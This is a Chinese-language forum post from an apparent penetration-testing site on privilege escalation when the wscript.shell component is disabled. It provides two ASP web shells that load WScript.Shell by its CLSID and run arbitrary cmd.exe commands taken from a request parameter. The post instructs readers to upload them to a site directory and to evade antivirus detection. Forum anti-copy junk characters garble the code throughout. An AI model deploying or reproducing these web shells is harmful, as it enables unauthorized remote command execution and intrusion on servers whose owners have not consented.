找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 没有wscript.shell组件提权方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2620|回复: 0
打印 上一主题 下一主题

没有wscript.shell组件提权方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-21 09:08:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  • 可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。) `5 r& J6 W5 W
  • 一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。" z! S7 J8 O+ B, G( [$ A- }
  • 要想让运行命令可以试试这种方法,成功率为五五之数。, B5 |4 g3 l( K" D0 x+ X3 m2 ?
  • 把下面代码复制:9 h, A) e- e  V
  • <%% V) a4 z+ j) O/ D8 g- Z% o+ [. G# M
  • end if- f% ]1 M" D5 P+ R& l" a+ O
  • response.write(”"). G' `: k1 O% o1 w: b
  • On Error Resume
    + T; V, x& M" w' E2 f" _
  • Next+ H+ z3 Z* Q# _7 d8 v
  • response.write oScriptlhn.exec(”cmd.exe /c” &   l! H' l; A0 @, I
  • request(”c”)).stdout.readall
    : M  W9 `8 F' g" M$ g+ x3 ^% r
  • response.write(”")$ [. _2 p( V. t* X% M5 k
  • response.write(”")
    $ ?3 X" ]; j, r9 b) l5 D
  • response.write(”6 B6 w9 j4 E8 P) [) h$ c' O$ Z
  • “)
    ' Y4 K1 q1 V1 h; b5 X3 Q! c0 j
  • response.write(”")
    , M% G+ ~0 G+ J! A) v/ l3 c8 R7 }8 M
  • %>
    % W9 w5 }+ s$ C0 C' c
  • 保存为一个asp文件,然后传到网站目录上去
    6 b5 T3 n' ~- J) V* e1 C0 w9 J
  • 运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。* ]7 V( ]* g. P+ U6 u# B% y7 V+ v! Z( v
  • 我用此成功运行过cacls命令。+ }# ^7 m/ N' E- R. q9 ]: }. z: l5 {
  • 第二那就是运行时出错,可能限制某些代码执行0 K! p$ B/ |/ e6 i5 a5 [8 ]
  • 无wscript.shell组件提权又一个方法/ M" p9 g) \$ f# I4 I
  • <object runat=server id=oScriptlhn scope=page / S* e8 P6 J1 y9 @

  • # H. y8 p) E, }/ L9 I
  • classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>% j: z# k) z. D, U* _: w" h
  • <%if err then%> ; f4 f9 X' u1 u! [5 V$ ]! ^
  • <object runat=server id=oScriptlhn scope=page 4 J5 u7 E& u$ V# B0 {7 X3 V; |6 D- z
  • 5 x' q9 X4 N: S  ^0 Y+ P/ `
  • classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>  I0 j( r. o7 m- B  |' S2 [
  • <%
    % z+ z2 \8 Q, d
  • end if + Q( G& P0 K+ f& F/ l
  • response.write(”<textarea readonly cols=80 3 \% W. Z. [& L! h( Y4 j
  • 9 |- p; `5 v5 Y+ B
  • rows=20>”)
    * D' G$ H. ^4 w$ X& @$ N; K
  • On Error Resume Next
    & o) s" z; R$ A: }
  • response.write 7 U! m# l( `! @0 \0 V" e. R: j- I  g

  • 4 A8 s; C  @! X
  • oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
    " |/ [5 A: s. O
  • response.write(”</textarea>”)
    + U7 o% F( h7 m/ i( d) I
  • response.write(”<form : D3 h" Z6 z) h3 {

  • : ?- X5 d$ K4 Z' ]- W& z: E
  • method=’post’>”) 8 {: T) n4 o7 @3 z
  • response.write(”<input type=text name=’c'
    1 F! b5 O! T$ d! R1 _: u$ F: x

  • 6 r8 y" @: [+ Q6 f& M) y
  • size=60><br>”) ! r0 y' M% Y! W5 B+ V& {4 @0 J
  • response.write(”<input type=submit
    # g* E% [! e: @: }
  • 5 F4 N# [$ V0 Y3 W, r/ R
  • value=’执行’></form>”) ( t% S" ?8 j  D+ R+ x4 U0 O
  • %>$ y) c$ s' Q( J, Z# ]$ z5 r- e
  • 保存为ASP,此代码可能被杀,请注意免杀。% W$ K7 G: A. }( ^
  • 原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建- _+ x+ }, B8 N. m
复制代码
request, server, 成功率

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表